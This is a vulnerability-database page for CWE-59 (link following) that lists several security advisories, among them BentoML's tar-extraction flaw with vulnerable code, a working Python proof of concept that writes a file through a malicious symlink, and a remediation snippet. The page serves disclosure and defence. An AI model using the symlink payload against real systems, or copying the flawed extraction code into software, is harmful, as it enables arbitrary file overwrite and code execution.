CWE-59
AllowedImproper Link Resolution Before File Access ('Link Following')
Abstraction: Base · Status: Draft
The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.
1990 vulnerabilities reference this CWE, most recent first.
GHSA-M5FG-QJQ5-56FV
Vulnerability from github – Published: 2026-07-10 00:31 – Updated: 2026-07-10 18:32decompress before 4.2.2 allows arbitrary symlink creation during archive extraction. When processing symlink entries (type === 'symlink'), the x.linkname field from the archive is passed directly to fs.symlink() without validation (index.js line 121). The preventWritingThroughSymlink check on line 98 only applies to file entries, not symlink creation. An attacker can craft an archive with symlink entries pointing to sensitive files outside the extraction directory (e.g., /etc/passwd), enabling information disclosure when the application reads the extracted contents.
{
"affected": [],
"aliases": [
"CVE-2026-39246"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-09T22:17:04Z",
"severity": "HIGH"
},
"details": "decompress before 4.2.2 allows arbitrary symlink creation during archive extraction. When processing symlink entries (type === \u0027symlink\u0027), the x.linkname field from the archive is passed directly to fs.symlink() without validation (index.js line 121). The preventWritingThroughSymlink check on line 98 only applies to file entries, not symlink creation. An attacker can craft an archive with symlink entries pointing to sensitive files outside the extraction directory (e.g., /etc/passwd), enabling information disclosure when the application reads the extracted contents.",
"id": "GHSA-m5fg-qjq5-56fv",
"modified": "2026-07-10T18:32:08Z",
"published": "2026-07-10T00:31:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39246"
},
{
"type": "WEB",
"url": "https://github.com/kevva/decompress/issues/114"
},
{
"type": "WEB",
"url": "https://github.com/kevva/decompress"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/package/decompress"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-M5MM-7F4V-27V9
Vulnerability from github – Published: 2022-05-14 03:30 – Updated: 2022-05-14 03:30In browser editing in Atlassian Bitbucket Server from version 4.13.0 before 5.4.8 (the fixed version for 4.13.0 through 5.4.7), 5.5.0 before 5.5.8 (the fixed version for 5.5.x), 5.6.0 before 5.6.5 (the fixed version for 5.6.x), 5.7.0 before 5.7.3 (the fixed version for 5.7.x), and 5.8.0 before 5.8.2 (the fixed version for 5.8.x), allows authenticated users to gain remote code execution using the in browser editing feature via editing a symbolic link within a repository.
{
"affected": [],
"aliases": [
"CVE-2018-5225"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-03-22T13:29:00Z",
"severity": "CRITICAL"
},
"details": "In browser editing in Atlassian Bitbucket Server from version 4.13.0 before 5.4.8 (the fixed version for 4.13.0 through 5.4.7), 5.5.0 before 5.5.8 (the fixed version for 5.5.x), 5.6.0 before 5.6.5 (the fixed version for 5.6.x), 5.7.0 before 5.7.3 (the fixed version for 5.7.x), and 5.8.0 before 5.8.2 (the fixed version for 5.8.x), allows authenticated users to gain remote code execution using the in browser editing feature via editing a symbolic link within a repository.",
"id": "GHSA-m5mm-7f4v-27v9",
"modified": "2022-05-14T03:30:14Z",
"published": "2022-05-14T03:30:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-5225"
},
{
"type": "WEB",
"url": "https://confluence.atlassian.com/x/3WNsO"
},
{
"type": "WEB",
"url": "https://jira.atlassian.com/browse/BSERV-10684"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/103488"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-M633-G3VP-7QW3
Vulnerability from github – Published: 2026-05-12 15:31 – Updated: 2026-05-12 15:31The consul-template library before version 0.42.0 is vulnerable to a sandbox path bypass in the file template helper that may allow reading an out-of-sandbox file. This vulnerability (CVE-2026-5061) is fixed in consul-template 0.42.0.
{
"affected": [],
"aliases": [
"CVE-2026-5061"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-12T15:16:16Z",
"severity": "MODERATE"
},
"details": "The consul-template library before version 0.42.0 is vulnerable to a sandbox path bypass in the file template helper that may allow reading an out-of-sandbox file. This vulnerability (CVE-2026-5061) is fixed in consul-template 0.42.0.",
"id": "GHSA-m633-g3vp-7qw3",
"modified": "2026-05-12T15:31:41Z",
"published": "2026-05-12T15:31:41Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5061"
},
{
"type": "WEB",
"url": "https://discuss.hashicorp.com/t/hcsec-2026-12-consul-template-vulnerable-to-sandbox-path-bypass-in-file-helper-through-symlink-attack/77414"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-M699-6XJ6-M4HP
Vulnerability from github – Published: 2026-03-03 18:31 – Updated: 2026-03-04 18:31An issue in the WiseDelfile64.sys component of WiseCleaner Wise Force Deleter 7.3.2 and earlier allows attackers to delete arbitrary files via a crafted request.
{
"affected": [],
"aliases": [
"CVE-2025-66680"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-03T16:16:17Z",
"severity": "HIGH"
},
"details": "An issue in the WiseDelfile64.sys component of WiseCleaner Wise Force Deleter 7.3.2 and earlier allows attackers to delete arbitrary files via a crafted request.",
"id": "GHSA-m699-6xj6-m4hp",
"modified": "2026-03-04T18:31:49Z",
"published": "2026-03-03T18:31:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66680"
},
{
"type": "WEB",
"url": "https://github.com/cwjchoi01/CVE-2025-66680/tree/main"
},
{
"type": "WEB",
"url": "https://www.wisecleaner.com/wise-force-deleter.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-M6CX-G6QM-P2CX
Vulnerability from github – Published: 2019-12-13 15:39 – Updated: 2021-10-21 21:16Versions of the npm CLI prior to 6.13.3 are vulnerable to an Arbitrary File Write. It fails to prevent access to folders outside of the intended node_modules folder through the bin field. A properly constructed entry in the package.json bin field would allow a package publisher to create files on a user's system when the package is installed. It is only possible to affect files that the user running npm install has access to and it is not possible to over write files that already exist on disk.
This behavior is still possible through install scripts. This vulnerability bypasses a user using the --ignore-scripts install option.
Recommendation
Upgrade to version 6.13.3 or later.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "npm"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.13.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2019-16775"
],
"database_specific": {
"cwe_ids": [
"CWE-59",
"CWE-61"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-17T16:30:50Z",
"nvd_published_at": "2019-12-13T01:15:00Z",
"severity": "HIGH"
},
"details": "Versions of the npm CLI prior to 6.13.3 are vulnerable to an Arbitrary File Write. It fails to prevent access to folders outside of the intended node_modules folder through the bin field. A properly constructed entry in the package.json bin field would allow a package publisher to create files on a user\u0027s system when the package is installed. It is only possible to affect files that the user running `npm install` has access to and it is not possible to over write files that already exist on disk.\n\nThis behavior is still possible through install scripts. This vulnerability bypasses a user using the --ignore-scripts install option.\n\n\n## Recommendation\n\nUpgrade to version 6.13.3 or later.",
"id": "GHSA-m6cx-g6qm-p2cx",
"modified": "2021-10-21T21:16:09Z",
"published": "2019-12-13T15:39:19Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/npm/cli/security/advisories/GHSA-m6cx-g6qm-p2cx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16775"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHEA-2020:0330"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2020:0573"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2020:0579"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2020:0597"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2020:0602"
},
{
"type": "WEB",
"url": "https://blog.npmjs.org/post/189618601100/binary-planting-with-the-npm-cli"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-m6cx-g6qm-p2cx"
},
{
"type": "PACKAGE",
"url": "https://github.com/npm/cli"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z36UKPO5F3PQ3Q2POMF5LEKXWAH5RUFP"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/1434"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujan2020.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00027.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Arbitrary File Write in npm"
}
GHSA-M6GQ-7H42-3FJ9
Vulnerability from github – Published: 2022-05-24 19:09 – Updated: 2022-05-24 19:09replay-sorcery-kms in Replay Sorcery 0.6.0 allows a local attacker to gain root privileges via a symlink attack on /tmp/replay-sorcery or /tmp/replay-sorcery/device.sock.
{
"affected": [],
"aliases": [
"CVE-2021-36983"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-07-30T14:15:00Z",
"severity": "HIGH"
},
"details": "replay-sorcery-kms in Replay Sorcery 0.6.0 allows a local attacker to gain root privileges via a symlink attack on /tmp/replay-sorcery or /tmp/replay-sorcery/device.sock.",
"id": "GHSA-m6gq-7h42-3fj9",
"modified": "2022-05-24T19:09:21Z",
"published": "2022-05-24T19:09:21Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-36983"
},
{
"type": "WEB",
"url": "https://github.com/matanui159/ReplaySorcery/releases"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/07/27/1"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-M6PP-3QRG-P5X2
Vulnerability from github – Published: 2023-01-20 09:30 – Updated: 2023-01-26 21:30A vulnerability in the CLI of Cisco TelePresence CE and RoomOS Software could allow an authenticated, local attacker to overwrite arbitrary files on the local system of an affected device. This vulnerability is due to improper access controls on files that are in the local file system. An attacker could exploit this vulnerability by placing a symbolic link in a specific location on the local file system of an affected device. A successful exploit could allow the attacker to overwrite arbitrary files on the affected device.
{
"affected": [],
"aliases": [
"CVE-2023-20008"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-01-20T07:15:00Z",
"severity": "HIGH"
},
"details": "A vulnerability in the CLI of Cisco TelePresence CE and RoomOS Software could allow an authenticated, local attacker to overwrite arbitrary files on the local system of an affected device. This vulnerability is due to improper access controls on files that are in the local file system. An attacker could exploit this vulnerability by placing a symbolic link in a specific location on the local file system of an affected device. A successful exploit could allow the attacker to overwrite arbitrary files on the affected device.",
"id": "GHSA-m6pp-3qrg-p5x2",
"modified": "2023-01-26T21:30:31Z",
"published": "2023-01-20T09:30:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-20008"
},
{
"type": "WEB",
"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-roomos-dkjGFgRK"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-M6QG-CQRQ-QX4J
Vulnerability from github – Published: 2022-05-17 05:17 – Updated: 2022-05-17 05:17Centrify Deployment Manager 2.1.0.283, as distributed in Centrify Suite before 2012.5, allows local users to (1) overwrite arbitrary files via a symlink attack on the adcheckDMoutput temporary file, or (2) overwrite arbitrary files and consequently gain privileges via a symlink attack on the centrify.cmd.0 temporary file.
{
"affected": [],
"aliases": [
"CVE-2012-6348"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2013-01-04T21:55:00Z",
"severity": "LOW"
},
"details": "Centrify Deployment Manager 2.1.0.283, as distributed in Centrify Suite before 2012.5, allows local users to (1) overwrite arbitrary files via a symlink attack on the adcheckDMoutput temporary file, or (2) overwrite arbitrary files and consequently gain privileges via a symlink attack on the centrify.cmd.0 temporary file.",
"id": "GHSA-m6qg-cqrq-qx4j",
"modified": "2022-05-17T05:17:02Z",
"published": "2022-05-17T05:17:02Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2012-6348"
},
{
"type": "WEB",
"url": "http://archives.neohapsis.com/archives/bugtraq/2012-12/0036.html"
},
{
"type": "WEB",
"url": "http://archives.neohapsis.com/archives/bugtraq/2012-12/0037.html"
},
{
"type": "WEB",
"url": "http://archives.neohapsis.com/archives/bugtraq/2012-12/0071.html"
},
{
"type": "WEB",
"url": "http://archives.neohapsis.com/archives/bugtraq/2012-12/0097.html"
},
{
"type": "WEB",
"url": "http://archives.neohapsis.com/archives/bugtraq/2012-12/0113.html"
},
{
"type": "WEB",
"url": "http://vapid.dhs.org/advisories/centrify_deployment_manager_insecure_tmp2.html"
},
{
"type": "WEB",
"url": "http://vapid.dhs.org/exploits/centrify_local_r00t.c"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-M6W7-QV66-G3MF
Vulnerability from github – Published: 2026-03-03 17:46 – Updated: 2026-03-04 02:00Arbitrary File Write via Symlink Path Traversal in Tar Extraction
Summary
The safe_extract_tarfile() function validates that each tar member's path is within the destination directory, but for symlink members it only validates the symlink's own path, not the symlink's target. An attacker can create a malicious bento/model tar file containing a symlink pointing outside the extraction directory, followed by a regular file that writes through the symlink, achieving arbitrary file write on the host filesystem.
Affected Component
- File:
src/bentoml/_internal/utils/filesystem.py:58-96 - Callers:
src/bentoml/_internal/cloud/bento.py:542,src/bentoml/_internal/cloud/model.py:504 - Affected versions: All versions with
safe_extract_tarfile()
Severity
CVSS 3.1: 8.1 (High)
AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
Vulnerability Details
Vulnerable Code (filesystem.py:58-96)
def safe_extract_tarfile(tar, destination):
os.makedirs(destination, exist_ok=True)
for member in tar.getmembers():
fn = member.name
path = os.path.abspath(os.path.join(destination, fn))
if not Path(path).is_relative_to(destination): # Line 64: INCOMPLETE
continue # Only checks member path, NOT symlink target
if member.issym():
tar._extract_member(member, path) # Line 75: Creates symlink with UNVALIDATED target
else:
fp = tar.extractfile(member)
with open(path, "wb") as destfp: # Line 92: open() FOLLOWS symlinks
shutil.copyfileobj(fp, destfp)
The Bug
- Line 64:
Path(path).is_relative_to(destination)checks the member's OWN path, not the symlink target - Line 75:
tar._extract_member()creates symlink with unvalidated target (e.g.,/etc) - Line 92:
open(path, "wb")follows the symlink, writing OUTSIDE the destination
os.path.abspath() does NOT resolve symlinks (only . and ..). The path check passes because the string path appears within destination, but open() follows the symlink to the actual target.
Proof of Concept
import io, os, shutil, tarfile, tempfile
from pathlib import Path
def create_malicious_tar(target_dir, target_file, payload):
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode='w:gz') as tar:
sym = tarfile.TarInfo(name='escape')
sym.type = tarfile.SYMTYPE
sym.linkname = target_dir
tar.addfile(sym)
info = tarfile.TarInfo(name=f'escape/{target_file}')
info.size = len(payload)
tar.addfile(info, io.BytesIO(payload))
buf.seek(0)
return buf
with tempfile.TemporaryDirectory() as tmpdir:
extract_dir = os.path.join(tmpdir, 'extract')
target_dir = os.path.join(tmpdir, 'outside')
os.makedirs(target_dir)
mal_tar = create_malicious_tar(target_dir, 'pwned.txt', b'PWNED')
tar = tarfile.open(fileobj=mal_tar, mode='r:gz')
# Reproduce filesystem.py:58-96
os.makedirs(extract_dir, exist_ok=True)
for member in tar.getmembers():
path = os.path.abspath(os.path.join(extract_dir, member.name))
if not Path(path).is_relative_to(extract_dir): continue
if member.issym():
tar._extract_member(member, path) # Symlink target NOT checked
else:
fp = tar.extractfile(member)
os.makedirs(os.path.dirname(path), exist_ok=True)
if fp:
with open(path, 'wb') as destfp: # Follows symlink!
shutil.copyfileobj(fp, destfp)
assert os.path.exists(os.path.join(target_dir, 'pwned.txt'))
print(open(os.path.join(target_dir, 'pwned.txt')).read()) # PWNED
Impact
1. Arbitrary file overwrite via shared bentos
BentoML users share pre-built bentos. A malicious bento can overwrite any writable file: ~/.bashrc, ~/.ssh/authorized_keys, crontabs, Python site-packages.
2. Remote code execution via file overwrite
Overwriting ~/.bashrc or Python packages achieves RCE.
3. BentoCloud deployments
safe_extract_tarfile() is called when pulling bentos from BentoCloud (bento.py:542). A malicious actor on BentoCloud can compromise any system that pulls a bento.
Remediation
Validate symlink targets:
if member.issym():
target = os.path.normpath(os.path.join(os.path.dirname(path), member.linkname))
if not Path(target).is_relative_to(dest):
logger.warning('Symlink %s points outside: %s', member.name, member.linkname)
continue
Or use Python 3.12+ tar.extractall(filter='data').
References
- CWE-59: Improper Link Resolution Before File Access ('Link Following')
- CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "bentoml"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.36"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27905"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-59"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-03T17:46:47Z",
"nvd_published_at": "2026-03-03T23:15:55Z",
"severity": "HIGH"
},
"details": "# Arbitrary File Write via Symlink Path Traversal in Tar Extraction\n\n## Summary\n\nThe `safe_extract_tarfile()` function validates that each tar member\u0027s path is within the destination directory, but for symlink members it only validates the symlink\u0027s own path, **not the symlink\u0027s target**. An attacker can create a malicious bento/model tar file containing a symlink pointing outside the extraction directory, followed by a regular file that writes through the symlink, achieving arbitrary file write on the host filesystem.\n\n## Affected Component\n\n- **File**: `src/bentoml/_internal/utils/filesystem.py:58-96`\n- **Callers**: `src/bentoml/_internal/cloud/bento.py:542`, `src/bentoml/_internal/cloud/model.py:504`\n- **Affected versions**: All versions with `safe_extract_tarfile()`\n\n## Severity\n\n**CVSS 3.1: 8.1 (High)**\n`AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H`\n\n## Vulnerability Details\n\n### Vulnerable Code (filesystem.py:58-96)\n\n```python\ndef safe_extract_tarfile(tar, destination):\n os.makedirs(destination, exist_ok=True)\n for member in tar.getmembers():\n fn = member.name\n path = os.path.abspath(os.path.join(destination, fn))\n if not Path(path).is_relative_to(destination): # Line 64: INCOMPLETE\n continue # Only checks member path, NOT symlink target\n if member.issym():\n tar._extract_member(member, path) # Line 75: Creates symlink with UNVALIDATED target\n else:\n fp = tar.extractfile(member)\n with open(path, \"wb\") as destfp: # Line 92: open() FOLLOWS symlinks\n shutil.copyfileobj(fp, destfp)\n```\n\n### The Bug\n\n1. Line 64: `Path(path).is_relative_to(destination)` checks the member\u0027s OWN path, not the symlink target\n2. Line 75: `tar._extract_member()` creates symlink with unvalidated target (e.g., `/etc`)\n3. Line 92: `open(path, \"wb\")` follows the symlink, writing OUTSIDE the destination\n\n`os.path.abspath()` does NOT resolve symlinks (only `.` and `..`). The path check passes because the string path appears within destination, but `open()` follows the symlink to the actual target.\n\n## Proof of Concept\n\n```python\nimport io, os, shutil, tarfile, tempfile\nfrom pathlib import Path\n\ndef create_malicious_tar(target_dir, target_file, payload):\n buf = io.BytesIO()\n with tarfile.open(fileobj=buf, mode=\u0027w:gz\u0027) as tar:\n sym = tarfile.TarInfo(name=\u0027escape\u0027)\n sym.type = tarfile.SYMTYPE\n sym.linkname = target_dir\n tar.addfile(sym)\n info = tarfile.TarInfo(name=f\u0027escape/{target_file}\u0027)\n info.size = len(payload)\n tar.addfile(info, io.BytesIO(payload))\n buf.seek(0)\n return buf\n\nwith tempfile.TemporaryDirectory() as tmpdir:\n extract_dir = os.path.join(tmpdir, \u0027extract\u0027)\n target_dir = os.path.join(tmpdir, \u0027outside\u0027)\n os.makedirs(target_dir)\n \n mal_tar = create_malicious_tar(target_dir, \u0027pwned.txt\u0027, b\u0027PWNED\u0027)\n tar = tarfile.open(fileobj=mal_tar, mode=\u0027r:gz\u0027)\n \n # Reproduce filesystem.py:58-96\n os.makedirs(extract_dir, exist_ok=True)\n for member in tar.getmembers():\n path = os.path.abspath(os.path.join(extract_dir, member.name))\n if not Path(path).is_relative_to(extract_dir): continue\n if member.issym():\n tar._extract_member(member, path) # Symlink target NOT checked\n else:\n fp = tar.extractfile(member)\n os.makedirs(os.path.dirname(path), exist_ok=True)\n if fp:\n with open(path, \u0027wb\u0027) as destfp: # Follows symlink!\n shutil.copyfileobj(fp, destfp)\n \n assert os.path.exists(os.path.join(target_dir, \u0027pwned.txt\u0027))\n print(open(os.path.join(target_dir, \u0027pwned.txt\u0027)).read()) # PWNED\n```\n\n## Impact\n\n### 1. Arbitrary file overwrite via shared bentos\nBentoML users share pre-built bentos. A malicious bento can overwrite any writable file: `~/.bashrc`, `~/.ssh/authorized_keys`, crontabs, Python site-packages.\n\n### 2. Remote code execution via file overwrite\nOverwriting `~/.bashrc` or Python packages achieves RCE.\n\n### 3. BentoCloud deployments\n`safe_extract_tarfile()` is called when pulling bentos from BentoCloud (bento.py:542). A malicious actor on BentoCloud can compromise any system that pulls a bento.\n\n## Remediation\n\nValidate symlink targets:\n```python\nif member.issym():\n target = os.path.normpath(os.path.join(os.path.dirname(path), member.linkname))\n if not Path(target).is_relative_to(dest):\n logger.warning(\u0027Symlink %s points outside: %s\u0027, member.name, member.linkname)\n continue\n```\n\nOr use Python 3.12+ `tar.extractall(filter=\u0027data\u0027)`.\n\n## References\n\n- CWE-59: Improper Link Resolution Before File Access (\u0027Link Following\u0027)\n- CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"id": "GHSA-m6w7-qv66-g3mf",
"modified": "2026-03-04T02:00:42Z",
"published": "2026-03-03T17:46:47Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-m6w7-qv66-g3mf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27905"
},
{
"type": "WEB",
"url": "https://github.com/bentoml/BentoML/commit/4e0eb007765ac04c7924220d643f264715cc9670"
},
{
"type": "PACKAGE",
"url": "https://github.com/bentoml/BentoML"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "BentoML Vulnerable to Arbitrary File Write via Symlink Path Traversal in Tar Extraction"
}
GHSA-M6XP-53G9-23JP
Vulnerability from github – Published: 2025-10-14 18:30 – Updated: 2025-10-14 18:30Improper link resolution before file access ('link following') in XBox Gaming Services allows an authorized attacker to elevate privileges locally.
{
"affected": [],
"aliases": [
"CVE-2025-59281"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-10-14T17:16:10Z",
"severity": "HIGH"
},
"details": "Improper link resolution before file access (\u0027link following\u0027) in XBox Gaming Services allows an authorized attacker to elevate privileges locally.",
"id": "GHSA-m6xp-53g9-23jp",
"modified": "2025-10-14T18:30:36Z",
"published": "2025-10-14T18:30:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59281"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59281"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation MIT-48.1
Strategy: Separation of Privilege
- Follow the principle of least privilege when assigning access rights to entities in a software system.
- Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted.
CAPEC-132: Symlink Attack
An adversary positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name.
CAPEC-17: Using Malicious Files
An attack of this type exploits a system's configuration that allows an adversary to either directly access an executable file, for example through shell access; or in a possible worst case allows an adversary to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.
CAPEC-35: Leverage Executable Code in Non-Executable Files
An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.
CAPEC-76: Manipulating Web Input to File System Calls
An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.